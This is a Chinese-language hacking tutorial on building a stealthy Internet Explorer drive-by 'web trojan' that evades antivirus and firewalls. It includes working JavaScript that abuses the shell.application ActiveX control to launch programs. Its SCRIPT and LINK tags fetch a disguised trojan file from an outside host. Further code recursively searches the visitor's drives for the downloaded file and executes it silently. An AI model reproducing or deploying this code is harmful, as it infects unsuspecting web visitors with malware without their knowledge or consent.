打造完美的ＩＥ网页木马

作者：碧雪   来源：第八军团 
      既然要打造完美的ＩＥ网页木马，首先就必须给我们的完美制定一个标准，我个人认为一个完美的ＩＥ网页木马至少应具备下列四项特征：  
　　一：可以躲过杀毒软件的追杀；  
　　二：可以避开网络防火墙的报警；  
　　三：能够适用于多数的ＷＩＮＤＯＷＳ操作系统（主要包括ＷＩＮ９８、ＷＩＮＭＥ、ＷＩＮ２０００、ＷＩＮＸＰ、ＷＩＮ２００３）中的多数ＩＥ版本（主要包括ＩＥ５．０、ＩＥ５．５、ＩＥ６．０），最好能打倒ＳＰ补丁；  
　　四：让浏览者不容易发觉ＩＥ变化，即可以悄无声息，从而可以长久不被发现。  
　　（注意以上四点只是指网页本身而言，但不包括你的木马程序，也就是说我们的网页木马只是负责运行指定的木马程序，至于你的木马程序的好坏只有你自己去选择啦！别找我要，我不会写的哦！）  
　　满足以上四点我想才可以让你的马儿更青春更长久，跑的更欢更快……  
　　看了上面的几点你是不是心动拉？别急，我们还是先侃侃现有的各种ＩＥ网页木马的不足吧！  
　　第一种：利用古老的MIME漏洞的ＩＥ网页木马  
　　这种木马现在还在流行，但因为此漏洞太过古老且适用的ＩＥ版本较少，而当时影响又太大，补丁差不多都补上啦，因此这种木马的种植成功率比较低。  
　　第二种：利用com.ms.activeX.ActiveXComponent漏洞，结合ＷＳＨ及ＦＳＯ控件的ＩＥ网页木马  
　　虽然com.ms.activeX.ActiveXComponent漏洞广泛存在于多数ＩＥ版本中，是一个比较好的漏洞，利用价值非常高，但却因为它结合了流行的病毒调用的ＷＳＨ及ＦＳＯ控件，使其虽说可以避开网络防火墙的报警，可逃不脱杀毒软件的追捕（如诺顿）。  
　　第三种：利用OBJECT对象类型确认漏洞（Ｏｂｊｅｃｔ　Ｄａｔａ　Ｒｅｍｏｔｅ）并结合ＷＳＨ及ＦＳＯ控件的ＩＥ网页木马（典型的代表有动鲨网页木马生成器）  
　　此种木马最大的优点是适应的ＩＥ版本多，且漏洞较新，但却有如下不足：  
　　１、因为此漏洞要调用Mshta.exe来访问网络下载木马程序，所以会引起防火墙报警（如天网防火墙）；  
　　２、如果此ＩＥ网页木马又利用了ＷＳＨ及ＦＳＯ控件，同样逃不脱杀毒软件的追捕（如诺顿），而  
动鲨网页木马又恰恰使用了ＷＳＨ及ＦＳＯ控件，叹口气……可惜呀……？  
　　３、再有就是这个漏洞需要网页服务器支持动态网页如ＡＳＰ、ＪＳＰ、ＣＧＩ等，这就影响了它的发挥，毕竟现在的免费稳定的动态网页空间是少之又少；虽说此漏洞也可利用邮件ＭＩＭＥ的形式（见我在安全焦点上发表的文章：《由错误MIME漏洞的利用想到的......---IE Object Data 数据远程执行漏洞的利用》http://www.xfocus.net/articles/200309/607.html）来利用，但经测试发现对ＩＥ６．０不起作用。  
　　看到上面的分析你是不是有了这种感觉：千军易得，一将难求，马儿成群，奈何千里马难寻！别急，下面让我带这大家一起打造我心中的完美ＩＥ网页木马。  
　　首先要躲过杀毒软件的追杀，我们就不能利用ＷＳＨ和ＦＳＯ控件，因为只要利用了ＷＳＨ和ＦＳＯ控件就一定逃不脱“诺顿”的追杀，这可叫我们该如何是好？！别急，经过我的努力工作（说真的我也是在研究ＡＳＰ木马时偶然发现的灵感）终于我有找到了一个可以用的控件，那就是 shell.application，并且它可是经过了安全认证的，可以在“我的电脑”域中的网页中畅通无阻的执行，比ＷＳＨ和ＦＳＯ更容易得到执行权限（利用跨域漏洞即可），请看下面javascript代码：  
<SCRIPT LANGUAGE="javascript" type="text/javascript">  
var shell=new ActiveXObject("shell.application");  
shell.namespace("c:\\Windows\\").items().item("Notepad.exe").invokeverb();  
</SCRIPT>  
保存为test.htm后打开看是否自动打开了记事本程序，而且不会象ＷＳＨ和ＦＳＯ那样出现是否允许运行的提示框，是不是有点兴趣啦？现在我们已可以运行所有已知路径的程序，但我们要求运行我们自己的木马程序，所以还要求把我们的木马程序下载到浏览者的电脑上并找出它的位置。我们一个个来解决：  
　　１、下载木马程序到浏览者的电脑中  
　　这一点可以有很多解决方法，比如我以前提到的ＷＩＮＤＯＷＳ帮助文件访问协议下载任意文件漏洞（its:），不过这次我们不用它，再教大家两个更好的下载方法：  
　　例一：利用SCRIPT标签，代码如下：  
<SCRIPT LANGUAGE="icyfoxlovelace" src="http://www.godog.y365.com/wodemuma/icyfox.bat"></SCRIPT>  
注意此处的LANGUAGE属性可以为除javascript、VBScript、JScript以外的字符串,也可以是汉字，至于src的属性当然是你的木马程序的地址啦！因为现在免费空间出于安全考虑，多数不允许上传exe文件，我们可以变通一下把扩展名exe改为bat或pif、scr、com，同样可以运行。  
　　例二：利用LINK标签，代码如下：  
<LINK href="http://www.godog.y365.com/wodemuma/icyfox.bat" rel=stylesheet type=text/css>  
把代码放在标签<HEAD></HEAD>中间，href属性值为木马程序的地址。  
上面两个是我所知的最好的两种下载木马程序的方法，它们下载后的程序都保存在在ＩＥ临时目录Temporary Internet Files目录下的子目录中。  
　　２、找出已下载到浏览者的脑中的木马程序路径  
　　我们可以利用shell.application控件的一些属性和方法，并结合js的错误处理try{}catch(e){}finally{}语句,进行递归调用来找到木马程序的路径，代码如下： function icyfoxlovelace(){  
//得到ＷＩＮＤＯＷＳ系统目录和系统盘  
url=document.location.href;  
xtmu=url.substring(6,url.indexOf('\\',9)+1);  
xtp=url.substr(6,3);  

var shell=new ActiveXObject("shell.application");  
var runbz=1;  

//此处设置木马程序的大小，以字节为单位  
//请把198201改为你的木马程序的实际大小  
var exeSize=198201;  

//设置木马程序名及扩展名(exe,com,bat,pif,scr)，用于判断是否是所下载的木马程序  
//请把下面两行中的icyfox改为你的木马程序名，bat改为你的木马程序的扩展名  
var a=/icyfox\[\d*\]\.bat/gi;  
a.compile("icyfox\\[\\d*\\]\\.bat","gi");  

var b=/[A-Za-z]:\\/gi;  
b.compile("[A-Za-z]:\\\\","gi");//正则表达式,用于判断是否是盘的根目录  

//下面的代码查找并运行木马程序  
wjj(xtmu+"Temporary Internet Files\\");//Content.IE5\if(runbz)wjj(xtp+"Documents and Settings\\");  
if(runbz)yp();  

//在所有硬盘分区下查找并运行木马程序  
function yp(){  
try{  
var c=new Enumerator(shell.namespace("c:\\").ParentFolder.Items());  
for (;!c.atEnd();c.moveNext()){  
if(runbz){if(b.test(c.item().path))wjj(c.item().path);}  
else break;  
}  
}catch(e){}  
}  

//利用递归在指定目录(包括子目录)下查找并运行木马程序  
function wjj(b){  
try{  
var c=new Enumerator(shell.namespace(b).Items());  
for (;!c.atEnd();c.moveNext()){  
if(runbz&&c.item().Size==exeSize&&a.test(c.item().path)){  
var f=c.item().path;  
var v=f.lastIndexOf('\\')+1;  
try{  
shell.namespace(f.substring(0,v)).items().item(f.substr(v)).invokeverb();//运行木马程序  
runbz=0;  
break;  
}catch(e){}  
}  
if(!c.item().Size)wjj(c.item().path+"\\");//如果是子目录则递归调用  
}  
}catch(e){}  
}  
}  
icyfoxlovelace();  
请把以上代码保存为icyfox.js。